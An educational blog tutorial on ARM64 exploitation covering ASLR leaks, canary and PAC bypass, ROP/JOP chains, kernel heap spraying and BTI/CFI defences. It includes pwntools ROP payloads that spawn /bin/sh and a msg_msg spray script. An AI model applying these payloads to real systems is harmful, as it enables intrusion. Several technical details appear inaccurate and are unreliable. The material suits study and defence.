Back to Technology

ARM Assembly Part 27: Security Research & Exploitation on ARM64

July 2, 2026 Wasil Zafar 25 min read

ASLR bypass, PAC oracle attacks, ROP/JOP chain construction on AArch64, kernel exploitation patterns, and hardware defences BTI and CFI.

Table of Contents

  1. ASLR on ARM64
  2. Stack Canaries
  3. PAC Bypass
  4. ROP on AArch64
  5. JOP Chains
  6. Kernel Exploitation
  7. Hardware Defences
  8. Case Study: ARM64 Exploitation
  9. Hands-On Exercises
  10. Summary

ARM Assembly Mastery

Your 28-step learning path • Currently on Step 27
1
Architecture History & Core Concepts
ARMv1→v9, RISC philosophy
2
ARM32 Instruction Set Fundamentals
ARM vs Thumb, CPSR
3
AArch64 Registers, Addressing & Data Movement
X/W regs, addressing modes
4
Arithmetic, Logic & Bit Manipulation
ADD/SUB, bitfield, CLZ
5
Branching, Loops & Conditional Execution
Branch types, jump tables
6
Stack, Subroutines & AAPCS
Calling conventions
7
Memory Model, Caches & Barriers
Weak ordering, DMB/DSB/ISB
8
NEON & Advanced SIMD
Vector ops, intrinsics
9
SVE & SVE2 Scalable Vectors
Predicate regs, HPC/ML
10
Floating-Point & VFP Instructions
IEEE-754, rounding modes
11
Exception Levels, Interrupts & Vectors
EL0–EL3, GIC
12
MMU, Page Tables & Virtual Memory
Stage-1 translation
13
TrustZone & Security Extensions
Secure monitor, TF-A
14
Cortex-M Assembly & Bare-Metal
NVIC, SysTick, linker scripts
15
Cortex-A System Programming & Boot
EL3→EL1, MMU setup, PSCI
16
Apple Silicon & macOS ABI
ARM64e PAC, Mach-O, dyld
17
Inline Assembly & C Interop
Constraints, clobbers
18
Performance Profiling & Micro-Opt
Pipeline hazards, PMU
19
Reverse Engineering & Binary Analysis
ELF, disassembly, CFR
20
Building a Bare-Metal OS Kernel
Bootloader, UART, scheduler
21
ARM Microarchitecture Deep Dive
OOO pipelines, branch predict
22
Virtualization Extensions
EL2 hypervisor, stage-2, KVM
23
Debugging & Tooling Ecosystem
GDB, OpenOCD/JTAG, ETM/ITM
24
Linkers, Loaders & Binary Format Internals
ELF deep dive, relocations, PIC
25
Cross-Compilation & Build Systems
GCC/Clang toolchains, CMake, firmware gen
26
ARM in Real Systems
Android, FreeRTOS/Zephyr, U-Boot, TF-A
27
Security Research & Exploitation
ASLR, PAC attacks, ROP/JOP, kernel exploit
You Are Here
28
Emerging ARMv9 & Future Directions
MTE, SME, confidential compute, AI accel

Security research on ARM64 blends intimate knowledge of the ISA with an understanding of OS memory layout, compiler mitigations, and hardware defences. This part covers the attack path from memory disclosure through ROP/JOP chain execution, examines kernel exploitation patterns specific to AArch64, and closes with the hardware control-flow integrity mechanisms — BTI and PAC — that are shifting the exploit landscape.

Educational purpose only. All techniques described here are presented for defensive understanding and security research in controlled, authorised environments. Applying exploitation techniques to systems you do not own or have explicit permission to test is illegal.
Analogy — Breaking into a Fortress: Think of an ARM64 process as a medieval fortress with layered defences. ASLR is like randomising the location of the castle every time you look away — you can't aim siege weapons if you don't know where the walls are. An information leak is a scout spy who reports back the castle's coordinates. Stack canaries are tripwires at every doorway — step on one and the alarm sounds. PAC is like a wax seal on every message: forge the seal and the message is accepted; break it and the guards attack. ROP chains are like Trojan horses — you don't bring your own army; you commandeer the castle's own soldiers (existing code gadgets) and issue commands they already know how to execute, just in an order the defenders never intended. BTI adds checkpoint gates that only allow soldiers arriving from approved routes. MTE is like colour-coding every room key — use a red key on a blue lock and it jams, even if the physical shape is correct.

ASLR on ARM64

KASLR & User-Space ASLR

AArch64 uses 48-bit virtual addresses (some implementations 52-bit with LPA). The OS randomises load addresses at multiple levels:

ASLR
ARM64 ASLR entropy sources (Linux)
TargetSysctl / flagBits of entropy
User stackmmap_rnd_bits (default 28)28 bits
mmap regionsmmap_rnd_bits28 bits
PIE executablemmap_rnd_bits28 bits
Kernel text (KASLR)nokaslr to disable~21 bits (2 MB aligned)
Kernel modulesindependent slot~18 bits
# Check ASLR configuration on Linux ARM64
cat /proc/sys/kernel/randomize_va_space   # 2 = full ASLR

# Check kernel KASLR state (requires root)
cat /proc/kallsyms | grep " T _text"      # text base changes on each boot
# With kptr_restrict=2, all shown as 0 — information leak barrier

# Disable ASLR for a single process (development/research only)
setarch aarch64 -R ./target_binary        # -R = ADDR_NO_RANDOMIZE

# Build a PIE binary (default with modern GCC/Clang)
aarch64-linux-gnu-gcc -pie -fPIE -o pie_target main.c

# Build non-PIE (known load address 0x400000) — for controlled experiments
aarch64-linux-gnu-gcc -no-pie -fno-PIE -o nopie_target main.c

Information Leaks — Breaking ASLR

ASLR is defeated when an attacker can read a pointer that reveals a randomised address. Common leak primitives on ARM64:

Leak vectors
Common pointer leak classes
  • Format string: printf(user_input)%p leaks stack/heap pointers directly.
  • Stack over-read: read() or recv() returning more bytes than written — uninitialized stack bytes contain saved return addresses or pointers to libc.
  • Use-After-Free heap read: reading freed memory whose allocator slot was refilled with a struct containing kernel/libc pointers.
  • Kernel /proc info: /proc/self/maps shows exact mappings when kptr_restrict=0.
  • Side-channel: cache-timing (Flush+Reload, Prime+Probe) or branch predictor oracles to infer randomised addresses when pointer values are inaccessible directly.
// Typical stack over-read leak pattern (educational excerpts)
// Vulnerable function: copies fixed bytes regardless of input length
// Stack layout after prologue (AArch64 ABI):
//   [x29 (frame ptr)] [x30 (saved LR)] [local_buf 64 bytes] ...
// If we can read 80 bytes starting at local_buf, we get saved x30 (ret addr in libc)

// Computing libc base from a leak:
// leaked_addr = read_bytes + 0x50  (stack over-read, little-endian u64)
// libc_base   = leaked_addr - known_offset_of_leaked_symbol_in_libc
// system_addr = libc_base  + offset_of_system_in_libc

// Find symbol offsets with:
//   aarch64-linux-gnu-readelf -s /lib/aarch64-linux-gnu/libc.so.6 | grep " system"
//   aarch64-linux-gnu-nm -D /lib/aarch64-linux-gnu/libc.so.6 | grep __libc_start_main

Stack Canaries on AArch64

GCC/Clang insert a stack canary (a random value at TLS offset -8 on AArch64) between local variables and the saved frame pointer. Any stack buffer overflow that overwrites the saved LR must first corrupt the canary, which is checked on function return.

; Compiler-generated canary prologue/epilogue (AArch64, GCC -fstack-protector-strong)
; Prologue — after regular save of x29/x30:
    mrs     x0, tpidr_el0          ; TLS base register
    ldr     x0, [x0, #-8]          ; load canary from TLS (glibc stores it here)
    str     x0, [sp, #24]          ; place canary on stack just above saved frame
    mov     x0, #0                 ; zero x0 so canary isn't left in register

; ... function body ...

; Epilogue — before restoring x29/x30:
    ldr     x1, [sp, #24]          ; reload canary from stack
    mrs     x0, tpidr_el0
    ldr     x0, [x0, #-8]          ; load expected canary from TLS
    eors    x0, x0, x1             ; XOR: result should be zero
    b.ne    __stack_chk_fail        ; canary mismatch → abort()

Bypass Techniques

Bypass
Canary bypass strategies
  • Leak then overwrite: Use an information leak to read the canary value from the stack or TLS, then include it verbatim in the overflow payload. Requires a separate read primitive before writing.
  • Partial overwrite (ARM64 specific): On AArch64 the saved LR occupies 8 bytes. If overflow is byte-granular, the low bytes of the return address can be patched while the canary remains intact — limited by alignment and null-byte constraints in the canary.
  • Canary brute-force: Only practical against forked servers (fork() preserves canary across child copies). The 8-byte canary can be brute-forced byte-by-byte — 256 attempts per byte × 7 non-null bytes = 1,792 max attempts.
  • Function pointer overwrite: If a function pointer lives before the canary on the stack (or on the heap), overwrite it instead to achieve control flow without touching the canary.

Pointer Authentication Code Bypass

PAC (Pointer Authentication Codes, ARMv8.3+) signs pointers with a cryptographic MAC stored in the top unused bits. Apple's ARM64e ABI mandates PAC for all return addresses; the Linux kernel enables it via arm64.pac_enabled_keys. Bypassing PAC is an active research area.

PAC key types: IA/IB (instruction pointers), DA/DB (data pointers), GA (generic). The kernel uses IA key for return addresses. The key material is stored in system registers APIAKeyLo_EL1/APIAKeyHi_EL1 — not directly readable from EL0.
; PAC sign/authenticate instructions
PACIASP             ; sign SP-context return address: LR = PAC(LR, SP, IA-key)
AUTIASP             ; authenticate: if PAC invalid → LR[63:56] = error bits → fault on RET
RET                 ; branches to LR (FEAT_PAUTH: also authenticates)

; PAC stripping (XPACLRI — used in debuggers, not executable normally from EL0)
XPACLRI             ; strip PAC from LR (available only in EL1/EL2/EL3)

; PACIB vs PACIA — two separate IA keys allow kernel/user to use different keys
PACIBSP             ; sign with IB key (kernel uses IA, some firmware uses IB)
AUTIBSP

PAC Oracle Attack Pattern

PAC research
Oracle-based PAC bypass (conceptual)

A PAC oracle arises when an attacker can call AUTIA (authenticate) on a chosen pointer and observe whether it fault-traps or succeeds — distinguishing valid from invalid PAC values. With enough oracle queries the valid PAC for a given pointer+context can be deduced. Attack steps:

  1. Obtain a code-execution primitive (e.g., a heap overflow into a vtable pointer that has not yet been signed).
  2. Use a JIT engine or mmap+mprotect(PROT_EXEC) to place code containing AUTIA x0, x1; RET.
  3. Invoke the gadget with the target pointer and candidate PAC values; fault vs success reveals if the PAC was correct.
  4. With 16-bit effective PAC space (upper byte, minus 0x00), ~65,536 queries suffice — feasible in a JIT-heavy context like Safari's JSCore where thousands of oracle calls per second are possible.

Mitigations: Apple A15+ uses full 24-bit PAC fields; iOS crash reporting limits crash-loop rate; jscBuiltin functions restricted to internal contexts.

Return-Oriented Programming on AArch64

ROP on AArch64 differs from x86-64 in one crucial way: the return address is stored in the link register (x30/LR), not on the stack, unless a subroutine call pushes it. However, most real functions save LR to the stack at their prologue — making AArch64 ROP very similar to x86-64 once we understand the gadget landscape.

Gadget Anatomy on AArch64

# Find ROP gadgets using Ropper (ARM64/AArch64 mode)
pip install ropper
ropper --file /lib/aarch64-linux-gnu/libc.so.6 --arch ARM64 --search "ret"

# Find specific useful gadgets
ropper --file /lib/aarch64-linux-gnu/libc.so.6 --arch ARM64 \
       --search "ldp x0, x1, [sp,?]; ret"

ropper --file /lib/aarch64-linux-gnu/libc.so.6 --arch ARM64 \
       --search "mov x0, x1; ret"

# ROPgadget (alternative tool)
ROPgadget --binary /lib/aarch64-linux-gnu/libc.so.6 --arch arm64 \
          --rop --nosys | grep "ret$"

# pwntools disassembly verification
python3 -c "
from pwn import *
context.arch = 'aarch64'
# Verify a gadget at a known offset
gadget_bytes = b'\xe0\x03\x01\xaa\xc0\x03\x5f\xd6'   # mov x0,x1; ret
print(disasm(gadget_bytes))
"
Gadget types
Essential AArch64 ROP gadget categories
PurposeGadget patternNotes
Load x0 (arg1)ldr x0, [sp, #N]; retSet function first argument
Load x1 (arg2)ldr x1, [sp, #N]; retSet function second argument
Load x2 (arg3)ldr x2, [sp, #N]; retThird argument for syscalls
Load multipleldp x0, x1, [sp]; retEfficient two-arg setup
Stack pivotmov sp, x0; retMove fake stack — critical
Write primitivestr x0, [x1]; retArbitrary write via two gadgets
Syscallsvc #0; retx8=NR, x0-x5=args

Building an AArch64 ROP Chain

#!/usr/bin/env python3
# AArch64 ROP chain construction with pwntools (educational example)
# Target: call system("/bin/sh") via ROP after stack buffer overflow
# Assumes: ASLR defeated (libc base known), stack canary defeated (leaked)

from pwn import *
context.arch    = 'aarch64'
context.log_level = 'info'

# Offsets from libc base (find with: nm -D libc.so.6 | grep -E "system| /bin/sh")
LIBC_BASE    = 0x7f8a000000     # leaked at runtime
system_off   = 0x0004f8c0       # offset of system() in libc
binsh_off    = 0x001725a0       # offset of "/bin/sh" string in libc

# Gadget offsets from libc base (found with ropper)
# gadget1: ldr x0, [sp, #8]; ldp x29, x30, [sp], #0x10; ret
pop_x0_off   = 0x0006ab3c
# gadget2: blr x0 (call via register — avoids direct call to PAC-signed ptr)
blr_x0_off   = 0x00055adc

system_addr  = LIBC_BASE + system_off
binsh_addr   = LIBC_BASE + binsh_off
pop_x0       = LIBC_BASE + pop_x0_off
blr_x0       = LIBC_BASE + blr_x0_off

# Stack overflow: overwrite saved x29, x30
# AArch64 stack frame:
#   [local_buffer 64 bytes]
#   [saved x29 (8 bytes)]
#   [saved x30 = return address (8 bytes)]
padding  = b'A' * 64
saved_x29 = p64(0x4141414141414141)   # fake frame pointer (benign)
rop_chain = (
    padding
    + saved_x29
    + p64(pop_x0)     # overwrite LR → first gadget
    + p64(0xdeadbeef) # padding for sp advance in gadget
    + p64(binsh_addr) # loaded into x0 by gadget
    + p64(blr_x0)     # call x0 (which is system) — x0="/bin/sh"
    # system(x0) executes "/bin/sh"
)
print(hexdump(rop_chain[:96]))

ret2libc — Call Convention on AArch64

AArch64 passes arguments in x0–x7. A ret2libc attack must populate these registers via gadgets before the pivot to system() or execve().

#!/usr/bin/env python3
# execve("/bin/sh", NULL, NULL) syscall chain on AArch64
# x0 = ptr to "/bin/sh",  x1 = NULL (argv),  x2 = NULL (envp),  x8 = 221 (__NR_execve)
from pwn import *
context.arch = 'aarch64'

LIBC_BASE  = 0x7fab200000
binsh_addr = LIBC_BASE + 0x001725a0

# Gadgets (all from libc — found with ropper/ROPgadget)
# g1: ldr x8, [sp, #0x18]; ldp x0, x1, [sp]; ldr x2, [sp, #0x10]; ret
# (hypothetical multi-load gadget for demonstration)
g1         = LIBC_BASE + 0x000abcde
svc_ret    = LIBC_BASE + 0x000f1234   # svc #0; ret

# Stack frame layout for gadget g1:
# sp+0x00: x0 = binsh_addr
# sp+0x08: x1 = 0 (NULL argv)
# sp+0x10: x2 = 0 (NULL envp)
# sp+0x18: x8 = 221 (__NR_execve on arm64)
frame = flat({
    0x00: binsh_addr,
    0x08: 0,
    0x10: 0,
    0x18: 221,
})
payload = b'A'*64 + b'B'*8 + p64(g1) + frame + p64(svc_ret)
print(f"Payload length: {len(payload)} bytes")

Jump-Oriented Programming (JOP)

JOP replaces the RET-based control flow of ROP with indirect branches (BR X0, BLR X0). It is used when RET instructions are filtered or when BTI makes RET-terminated gadgets non-exploitable via certain jump sources.

; JOP dispatcher gadget pattern (found in device driver or JIT code)
; A "dispatch" gadget loads the next gadget address and jumps to it
; Control remains with the attacker-controlled sequence of indirect branches.

; ---- Dispatcher gadget ----
; ldr x0, [x20], #8    ; load next gadget pointer from x20 (fake stack), advance
; br  x0               ; jump to it — NOT a RET

; ---- Function gadget example ----
; mov x0, x1           ; set argument
; br  x8               ; transfer to dispatcher (x8 = dispatcher address, fixed)

; Attacker controls x20 (fake dispatch table in writable memory):
; [addr_of_gadget_A]
; [addr_of_gadget_B]
; [addr_of_gadget_C — system()]
; ...

; The dispatcher advances through the table, calling each gadget with br x0,
; each gadget ends with br x8 to return to dispatcher.

; Key difference from ROP: no RET instruction used → avoids RET-based CFI.
BTI impact on JOP: Branch Target Identification (ARMv8.5) marks valid indirect branch targets with a BTI instruction as their first instruction. A BR X0 targeting a non-BTI-marked address faults. JOP gadgets in BTI-protected code must begin with BTI J (jump) or BTI JC (jump+call). This dramatically reduces the useful JOP gadget surface in BTI-hardened binaries.

Kernel Exploitation Patterns on ARM64

Use-After-Free via the Slab Allocator

UAF
Kernel UAF exploitation steps (ARM64 Linux)
  1. Trigger allocation: Call a kernel API (e.g., open(), socket(), perf_event_open()) that allocates a kernel-controlled struct via kmalloc().
  2. Free without clearing reference: Exploit a refcount bug or double-free to return the slab object to the allocator while a dangling pointer remains in a stale data structure.
  3. Reallocate with attacker-controlled data: Fill the freed slot via a different allocator path — often msg_msg (POSIX message queues, size-flexible) or pipe_buffer which accept partially attacker-controlled data.
  4. Corrupt function pointer or cred struct: If the original struct contained a function pointer (e.g., file_operations, sock_ops), overwrite it to redirect execution. Alternatively, overwrite a task_struct→cred pointer to escalate privileges.
  5. Trigger UAF dispatch: Invoke the original operation (e.g., read(), ioctl()) which dereferences the now-corrupted slab object.
# Heap spray via msg_msg (Linux, arbitrary kernel object size control)
# The msg_msg header is 48 bytes; data immediately follows.
# Allocate many POSIX message queue entries to fill freed slots.

python3 - <<'EOF'
import ctypes, os, struct

MSGMAX  = 0x2000    # max message size
queue   = ctypes.CDLL(None).msgget(ctypes.c_int(-1), 0o1666)
if queue < 0:
    raise OSError("msgget failed")

# Fill slab with 200 controlled msg_msg objects (each padded to target size)
msg_payload = b'\x41' * 200   # 200 bytes of 'A' — will occupy freed slab slot
for _ in range(200):
    # msgsnd: type=1, data=msg_payload
    buf = struct.pack("q", 1) + msg_payload
    ctypes.CDLL(None).msgsnd(queue, buf, len(msg_payload), 0)

print(f"[+] Sprayed 200 msg_msg objects onto queue {queue}")
EOF

Heap Spray Strategies

Spray objects
Commonly used kernel spray objects (Linux arm64)
ObjectSyscallSize rangeContents
msg_msgmsgsnd()48 – 8192 BAttacker-controlled message body
pipe_bufferpipe()64 B (fixed)Has pipe_buf_operations function ptr
timerfd_ctxtimerfd_create()216 BHolds a wait_queue_head
sk_buffrecvfrom()VariableNetwork data — widely used for large sprays
bpf_mapbpf(BPF_MAP_CREATE)VariableeBPF map — size precisely controllable

Hardware Defences — BTI and CFI

Branch Target Identification (BTI)

BTI is a hardware mechanism introduced in ARMv8.5 that restricts which addresses indirect branches (BR, BLR, BLRAAZ, etc.) may jump to. Valid targets must begin with a BTI landing pad instruction. Attempting to branch to a non-BTI target while BTI is enabled in the page tables causes a BTITRAP fault.

; BTI landing pad variants
BTI C       ; valid target for BLR (call) instructions only
BTI J       ; valid target for BR  (jump) instructions only
BTI JC      ; valid target for both BR and BLR

; Compiler-generated function entry with BTI (clang -mbranch-protection=bti)
    .global my_function
    .type   my_function, %function
my_function:
    BTI C                    ; landing pad — accepts BLR my_function
    stp     x29, x30, [sp, #-16]!
    ; ... function body ...
    ldp     x29, x30, [sp], #16
    ret                      ; RET is not an indirect branch; always valid

; PACIASP + BTI combo (most common in production — -mbranch-protection=standard)
my_function2:
    PACIASP                  ; doubles as BTI C landing pad (FEAT_PACBTI)
    stp     x29, x30, [sp, #-16]!
    ; ...
    ldp     x29, x30, [sp], #16
    AUTIASP
    RET
# Enable BTI in a Linux ELF binary
clang --target=aarch64-linux-gnu \
      -mbranch-protection=standard \   # enables PAC + BTI
      -march=armv8.5-a                 \
      -O2 -o btimain main.c

# Verify BTI note in ELF (GNU property)
readelf -n btimain | grep -A2 "NT_GNU_PROPERTY_TYPE_0"
# Should show: AArch64 feature: BTI, PAC

# Check if kernel enforces BTI for a process
# (requires CONFIG_ARM64_BTI_KERNEL, kernel 5.10+)
cat /proc/$(pidof btimain)/smaps | grep -A 2 "07400000"
# flags field will show "BTI"

LLVM CFI on AArch64

Software CFI (LLVM -fsanitize=cfi) instruments every indirect call with a type-check at compile time. Hardware + software CFI layers are complementary: BTI stops branch-to-arbitrary-code; LLVM CFI additionally restricts which typed functions a given call site may invoke.

# Build with LLVM CFI (requires LTO for cross-TU visibility)
clang --target=aarch64-linux-gnu \
      -flto=thin \
      -fvisibility=hidden \        # required for cross-DSO CFI
      -fsanitize=cfi \             # all CFI sub-checks enabled
      -fsanitize-cfi-cross-dso \   # enforce across shared library boundaries
      -O2 -o cfi_target main.c liba.c

# Or enable specific sub-checks only
clang --target=aarch64-linux-gnu \
      -flto=thin -fvisibility=hidden \
      -fsanitize=cfi-icall \       # indirect call type check only
      -fsanitize=cfi-nvcall \      # C++ non-virtual member call check
      -O2 -o cfi_partial main.cpp

# Test: calling a function through a mistyped pointer triggers abort()
# CFI check compiles to a masked address comparison inline at the call site:
#   and  x0, x0, #~15           // check alignment constraint of type
#   ldr  x1, =__cfi_check_table
#   blr  x1                     // call CFI runtime check
CFI layers
Defence-in-depth stack against ROP/JOP on modern ARM64
LayerMechanismDefeats
Stack canary-fstack-protector-allLinear stack overflow
ASLR (28-bit)Kernel mmap_rnd_bitsHardcoded address shellcode
PAC (IA key)ARMv8.3 FEAT_PAUTHReturn address overwrite
BTIARMv8.5 FEAT_BTIArbitrary indirect branch targets
LLVM CFI-fsanitize=cfiWrong-type indirect calls
MTE (ARMv8.5)Memory taggingHeap/stack UAF and overflows
Shadow Call StackClang -fsanitize=shadow-call-stackLR overwrite even if PAC unavailable

Case Study: ARM64 Exploitation in the Wild

Real-World Exploit

FORCEDENTRY (CVE-2021-30860) — Zero-Click iPhone Exploit

In September 2021, Citizen Lab and Google Project Zero disclosed FORCEDENTRY, a zero-click exploit targeting Apple's iMessage on ARM64 iPhones. The exploit chain was attributed to the NSO Group's Pegasus spyware and demonstrated every technique covered in this article operating against the strongest ARM64 defences available.

The attack path: A malformed PDF was sent via iMessage. The PDF triggered a bug in CoreGraphics' JBIG2 decoder — a format from the 1990s. The JBIG2 decoder's arithmetic operations were abused to create a Turing-complete virtual machine inside the decoder itself, using AND/OR/XOR operations on bitmap regions as logic gates. This VM bootstrapped a second-stage exploit that escaped the IMTranscoderAgent sandbox.

ARM64-specific elements: The exploit had to defeat PAC (iPhone's ARM64e enforcement), ASLR (with limited leak primitives since no JavaScript engine was involved), and the BlastDoor sandbox (introduced in iOS 14 specifically to harden iMessage). The JBIG2 VM approach was chosen precisely because it operated within data-only memory regions, never executing attacker-controlled code — bypassing both PAC and BTI entirely by avoiding any modification of code pointers.

Impact: Apple patched the vulnerability in iOS 14.8. Google's analysis called it "one of the most technically sophisticated exploits we've ever seen." It demonstrated that even PAC + BTI + ASLR + sandbox layering can be circumvented when the attacker builds a computation engine entirely within data-processing logic.

Historical Evolution

ARM Exploitation: From Simple Overflows to Defence-Aware Chains (2005–2024)

2005–2010 — The Easy Years: Early ARM exploits (targeting Windows Mobile, early Android) used textbook stack buffer overflows. No ASLR, no canaries, no NX bit on ARMv5/v6. Shellcode was injected directly onto the stack and jumped to — identical to 1990s x86 exploitation but with Thumb/ARM encoding quirks.

2011–2015 — ASLR and NX Arrive: Android 4.1 (2012) enabled full ASLR. ARM added the XN (Execute Never) bit in page tables. Exploiters pivoted to ROP — the same transition that x86 went through 5–7 years earlier. AArch64's larger register file (31 GPRs) and consistent 4-byte instruction width made gadget finding cleaner than on ARM32's mixed ARM/Thumb encoding.

2016–2020 — PAC and Hardware Defences: Apple's A12 Bionic (2018) shipped FEAT_PAUTH — the first commercial PAC implementation. Research teams (PACMAN at MIT, 2022) demonstrated speculative execution could bypass PAC. Kernel exploitation shifted from code-pointer corruption to data-only attacks (overwriting cred structs, modifying selinux_enforcing).

2021–2024 — MTE and the Data-Only Era: ARMv8.5 MTE began appearing in production (Pixel 8, 2023). Google and Android adopted MTE for both heap and stack protection. Exploit development focused increasingly on logic bugs (race conditions, TOCTOU) rather than memory corruption, as PAC + BTI + MTE raised the cost of traditional memory exploitation to the point where only nation-state actors consistently succeed.

Hands-On Exercises

Exercise 1 — Beginner

ASLR Observation & Information Leak

Write a C program that prints the addresses of main(), a stack variable, a heap allocation, and printf() from libc. Run it 10 times with ASLR enabled and 10 times with ASLR disabled. Calculate the entropy for each region.

// aslr_probe.c — observe ASLR randomisation on ARM64
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main(void)
{
    int stack_var = 42;
    void *heap_var = malloc(64);

    printf("=== ASLR Probe ===\n");
    printf("main()    = %p  (code/PIE)\n", (void *)main);
    printf("stack_var = %p  (stack)\n",     (void *)&stack_var);
    printf("heap_var  = %p  (heap)\n",      heap_var);
    printf("printf    = %p  (libc)\n",      (void *)printf);
    printf("Δ libc-main = 0x%lx\n",
        (uintptr_t)printf - (uintptr_t)main);

    free(heap_var);
    return 0;
}

// Compile and run:
// aarch64-linux-gnu-gcc -pie -fPIE -O0 -o aslr_probe aslr_probe.c
// for i in $(seq 1 10); do qemu-aarch64 -L /usr/aarch64-linux-gnu ./aslr_probe | grep main; done
// setarch aarch64 -R qemu-aarch64 -L /usr/aarch64-linux-gnu ./aslr_probe  # ASLR off

Expected Learning: With ASLR, addresses change each run but offsets between symbols in the same region remain constant — demonstrating why a single leak defeats entire-module ASLR.

Exercise 2 — Intermediate

ROP Gadget Hunting with Ropper

Install Ropper and search for gadgets in the AArch64 libc.so.6. Find gadgets to: (1) load x0 from the stack, (2) load x8 from the stack, (3) execute svc #0. Construct a payload layout (on paper) that would call write(1, "PWNED", 5) via the __NR_write syscall (64).

# Install ropper
pip install ropper

# Search for useful gadgets in ARM64 libc
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "ldr x0"

# Find stack-loading gadgets
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "ldp x0, x1, [sp"

# Find syscall gadgets
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "svc"

# Count total available gadgets
ropper --file /usr/aarch64-linux-gnu/lib/libc.so.6 --arch ARM64 \
       --search "ret" | wc -l

# For write(1, buf, 5): x0=1, x1=buf_addr, x2=5, x8=64
# Sketch your chain: gadget1 (set x0,x1) → gadget2 (set x2,x8) → svc

Expected Learning: AArch64 has abundant ldp-based gadgets (loading two registers from stack simultaneously) due to the calling convention's prologue/epilogue pattern — making chain construction easier than on ARM32.

Exercise 3 — Advanced

Compile & Inspect BTI/PAC Protection

Compile a simple program with -mbranch-protection=standard (PAC + BTI) and without it. Disassemble both binaries and compare function prologues. Count the number of BTI, PACIASP, and AUTIASP instructions in each. Then use readelf to verify the GNU property notes.

# Create test program with indirect calls
cat > cfi_test.c <<'EOF'
#include <stdio.h>
typedef int (*fn_ptr)(int);

int double_it(int x)  { return x * 2; }
int triple_it(int x)  { return x * 3; }

int apply(fn_ptr f, int x) { return f(x); }

int main(void) {
    fn_ptr funcs[] = { double_it, triple_it };
    for (int i = 0; i < 2; i++)
        printf("Result: %d\n", apply(funcs[i], 21));
    return 0;
}
EOF

# Compile WITHOUT protection
aarch64-linux-gnu-gcc -O2 -o cfi_none cfi_test.c
aarch64-linux-gnu-objdump -d cfi_none | grep -cE "bti|paciasp|autiasp"

# Compile WITH PAC+BTI
aarch64-linux-gnu-gcc -O2 -mbranch-protection=standard \
    -march=armv8.5-a -o cfi_prot cfi_test.c
aarch64-linux-gnu-objdump -d cfi_prot | grep -cE "bti|paciasp|autiasp"

# Compare function prologues
echo "=== Without protection ==="
aarch64-linux-gnu-objdump -d cfi_none | grep -A5 "<double_it>:"
echo "=== With PAC+BTI ==="
aarch64-linux-gnu-objdump -d cfi_prot | grep -A5 "<double_it>:"

# Verify ELF notes
aarch64-linux-gnu-readelf -n cfi_prot | grep -A3 "NT_GNU_PROPERTY"

Expected Learning: Protected binaries add PACIASP (which doubles as BTI C landing pad) at every function entry and AUTIASP before every RET. The GNU property note signals the dynamic linker to enable BTI enforcement in page table permissions.

Summary

ARM64 security research demands assembly-level fluency. The AArch64 calling convention, link-register return mechanism, and 64-bit virtual address space all shape the exploit primitive landscape:

  • ASLR — 28-bit entropy; defeated via information leaks (stack over-reads, format strings, UAF, side-channels).
  • Stack canaries — bypassed by leak-then-overwrite or byte-level partial overwrites, with brute-force against forked servers.
  • PAC — signs return addresses with cryptographic MACs; oracle attacks require a sign/authenticate primitive coupled with a crash-rate oracle under a narrow entropy window.
  • ROP on AArch64 — gadgets terminate in ret; AAPCS provides 8-argument registers to set via load gadgets; ldp instructions create compact multi-register setup gadgets.
  • JOP — replaces ret with br x0; needs a dispatcher gadget; BTI enforcement in production binaries shrinks JOP gadget surfaces dramatically.
  • Kernel exploitation — UAF via slab with cross-cache heap spray remains the dominant pattern; msg_msg and pipe_buffer are the canonical spray objects.
  • Defences — BTI (hardware), PAC (hardware), LLVM CFI (software), MTE (hardware), Shadow Call Stack (software) create a layered security model where each layer independently raises the exploit cost.

Next in the Series

In Part 28: Emerging ARMv9 & Future Directions, we explore the technologies shipping in the latest ARM silicon: Memory Tagging Extension (MTE), Scalable Matrix Extension (SME), Confidential Compute Architecture (CCA) Realm VMs, and AI/ML matrix multiply instructions — closing the series with a forward-looking view of the ARM architecture roadmap.

Technology